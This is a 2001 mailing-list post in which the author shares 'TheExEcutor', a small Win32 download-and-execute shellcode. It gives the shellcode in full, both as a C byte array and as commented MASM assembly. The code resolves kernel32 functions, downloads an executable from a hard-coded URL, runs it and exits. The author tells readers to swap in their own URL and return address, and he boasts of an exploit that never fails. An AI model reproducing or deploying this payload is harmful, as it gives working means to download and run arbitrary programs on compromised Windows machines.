Vulnerability Development mailing list archives
TheExEcutor Class A v1.0 - Special Win32 Shellcode
From: "Enrique A. Compañ Gzz." <enrique () virtekweb net>
Date: Sat, 8 Sep 2001 15:38:24 -0500
This is the 1st version of my download & execute code... it searches the
EXPORT table of KERNEL32
at a given KERNEL BASE.
This code is the smallest I've seen on its class... less than 300 bytes
Can be even smaller? yes... Can be more optimized? yes... That will be done
in future releases.
The Class B of this shellcode will search for the functions in the
**IMPORT** table at a given
base.... for example, inetinfo.exe base is 1000000h, by looking at the
import table there, you will
never fail executing the shellcode, you'll get always the correct addresses
=)....
Also compression & polymorphism will be implemented.
I created an exploit that uses classB.... has never failed. (scary)
Attached to this message: The ASM code and a VC++ file to test the
shellcode.............
Note: you have to change the C++ file... put another EIP. the one i'm using
is at shell 32 (call esp or jmp esp)...
I'm using W2k sp1. Also, change the scode and include the url you want.
unsigned char TheExEcutor[293] = {
0xEB, 0x67, 0x5E, 0x8B, 0xEC, 0x8B, 0x06, 0x66, 0x33, 0xC0, 0x8B, 0xD8,
0x03, 0x40, 0x3C, 0x8B,
0x40, 0x78, 0x03, 0xC3, 0x8B, 0x78, 0x20, 0x8D, 0x3C, 0x3B, 0x03, 0x1F,
0x33, 0xD2, 0x33, 0xC9,
0x43, 0x38, 0x13, 0x75, 0x01, 0x41, 0x81, 0x3B, 0x47, 0x65, 0x74, 0x50,
0x75, 0x0B, 0x81, 0x7B,
0x04, 0x72, 0x6F, 0x63, 0x41, 0x75, 0x02, 0x74, 0x02, 0xEB, 0xE5, 0x50,
0x41, 0x33, 0xC0, 0xB0,
0x04, 0xF7, 0xE1, 0x8B, 0xC8, 0x58, 0x03, 0xC1, 0x83, 0xC0, 0x24, 0xFF,
0x76, 0x02, 0x66, 0xFF,
0x30, 0x5B, 0x56, 0x83, 0xC6, 0x04, 0x46, 0x80, 0x3E, 0xFF, 0x75, 0x03,
0x80, 0x36, 0xFF, 0x81,
0x3E, 0x4B, 0x49, 0x4B, 0x45, 0x75, 0xEF, 0xEB, 0x02, 0xEB, 0x4B, 0x5E,
0x8B, 0xE5, 0x8B, 0x06,
0x66, 0x33, 0xC0, 0x50, 0x83, 0xC6, 0x04, 0x56, 0x50, 0xFF, 0xD3, 0x83,
0xC6, 0x0D, 0x56, 0xFF,
0xD0, 0x83, 0xC6, 0x07, 0x56, 0x50, 0xFF, 0xD3, 0x33, 0xC9, 0x51, 0x51,
0x83, 0xC6, 0x13, 0x56,
0x83, 0xC6, 0x1C, 0x56, 0x51, 0xFF, 0xD0, 0x58, 0x50, 0x83, 0xEE, 0x08,
0x56, 0x50, 0xFF, 0xD3,
0x33, 0xC9, 0x51, 0x83, 0xEE, 0x14, 0x56, 0xFF, 0xD0, 0x58, 0x83, 0xC6,
0x08, 0x56, 0x50, 0xFF,
0xD3, 0x33, 0xC9, 0x51, 0xFF, 0xD0, 0xE8, 0x47, 0xFF, 0xFF, 0xFF, 0xFF,
0xFF, 0xE8, 0x77, 0x4C,
0x6F, 0x61, 0x64, 0x4C, 0x69, 0x62, 0x72, 0x61, 0x72, 0x79, 0x41, 0xFF,
0x55, 0x52, 0x4C, 0x4D,
0x4F, 0x4E, 0xFF, 0x55, 0x52, 0x4C, 0x44, 0x6F, 0x77, 0x6E, 0x6C, 0x6F,
0x61, 0x64, 0x54, 0x6F,
0x46, 0x69, 0x6C, 0x65, 0x41, 0xFF, 0x73, 0x79, 0x73, 0x2E, 0x65, 0x78,
0x65, 0xFF, 0x45, 0x78,
0x69, 0x74, 0x50, 0x72, 0x6F, 0x63, 0x65, 0x73, 0x73, 0xFF, 0x57, 0x69,
0x6E, 0x45, 0x78, 0x65,
0x63, 0xFF, "http://box.net/baby.exe";, 0xFF, 0x4B, 0x49, 0x4B, 0x45,
} ;
NOTE: SUBSTITUTE THE URL WITH THE ONE YOU WANT, IE. "0x68, 0x74, 0x74,
0x70...." (HTTP...)....
;
; "TheExEcutor" Class A v1.0 - Win32 Shellcode
;
; Copyright (c) 2001 by Enrique A. Compañ Gzz.
;
; Virtek Labs
;
; http://www.virtekweb.net/labs
;
;
; Downloads & Executes a file. It searches for function addresses
; automatically by looking at the EXPORT table of Kernel32 with a
; default Kernel base of 78e80000h. You can change this.
;
.386
.model flat, stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\kernel32.inc
includelib \masm32\lib\kernel32.lib
include \masm32\include\user32.inc
includelib \masm32\lib\user32.lib
.data
data db "blah"
.code
shell_code_start:
jmp fix_long_jmp ;Jump to call back function
call_back:
pop esi ;ESI = first var offset
real_code_start:
mov ebp, esp ;Normalize the stack
mov eax, [esi] ;eax = ptr to "MZ" (Kernel Base)
xor ax, ax
mov ebx, eax ;ebx = ptr to "MZ"
add eax, [eax+3ch] ;eax = ptr to "PE"
mov eax, [eax+78h] ;eax = export tables RVA
add eax, ebx ;eax = ptr to export tables
mov edi, [eax+20h] ;edi = names tables RVA
lea edi, [edi+ebx] ;edi = names table ptr
; Ex table = 77ed5c20
; Names tables with RVAs of names = 77ed6f92
add ebx, [edi]
xor edx, edx
xor ecx, ecx
search_function:
inc ebx
cmp [ebx], dl
jne no_zero
inc ecx
no_zero:
cmp [ebx], DWORD PTR 'PteG'
jne no_match
cmp [ebx+4], DWORD PTR 'Acor'
jne no_match
je search_complete
no_match:
jmp search_function
search_complete:
push eax
inc ecx
xor eax, eax
mov al, 4
mul ecx
mov ecx, eax
pop eax
add eax, ecx
add eax, 024h
push [esi+2]
push word ptr [eax]
pop ebx ;EBX = GetProcAddress address... finally!
; Decode the NULL chars
push esi
add esi, 4
decode_loop:
inc esi
cmp byte ptr [esi], 0ffh
jne skip_xor
xor byte ptr [esi], 0ffh
skip_xor:
cmp [esi], dword ptr 'EKIK'
jne decode_loop
;Trick to avoid Nulls in the first jmp instruction...
jmp skip_fix_long_jmp ;Skipt the special jump
fix_long_jmp:
jmp pi_offset ;Continue the jump to the call back function
skip_fix_long_jmp:
;Now we Download & Execute the file and terminate
pop esi
mov esp, ebp ;Normalize ESP
mov eax, [esi] ;eax = ptr to "MZ" (Kernel Base)
xor ax, ax
push eax
add esi, 4
push esi
push eax
call ebx ;Call GetProcAddress
add esi, 13
push esi
call eax ;Call LoadLibraryA
add esi, 7
push esi
push eax
call ebx ;Call GetProcAddress
xor ecx, ecx
push ecx
push ecx
add esi, 19
push esi
add esi, 28
push esi
push ecx ;Call URLDownloadToFileA
call eax
pop eax
push eax
sub esi, 8
push esi
push eax
call ebx ;Call GetProcAddress
xor ecx, ecx
push ecx
sub esi, 20
push esi
call eax ;Call WinExec
pop eax
add esi, 8
push esi
push eax
call ebx ;Call GetProcAddress
xor ecx, ecx
push ecx
call eax ;Call ExitProcess
real_code_end:
pi_offset:
call call_back ;Return and push the address of the vars
vars_start:
db 0ffh,0ffh,0e8h,077h ;Specify the Kernel Base @ 77e80000h
db "LoadLibraryA",0ffh
db "URLMON",0ffh
db "URLDownloadToFileA",0ffh
db "sys.exe",0ffh
db "ExitProcess", 0ffh
db "WinExec",0ffh
db "http://box.net/baby.exe",0ffh ;The URL: Be sure to end it
with 0ffh
db "KIKE",0h ;Marker to know we
reached the END
end shell_code_start
--------------
Wooh... that was long...
See u....
Attachment:
code.zip
Description:
Current thread:
- TheExEcutor Class A v1.0 - Special Win32 Shellcode Enrique A. Compañ Gzz. (Sep 08)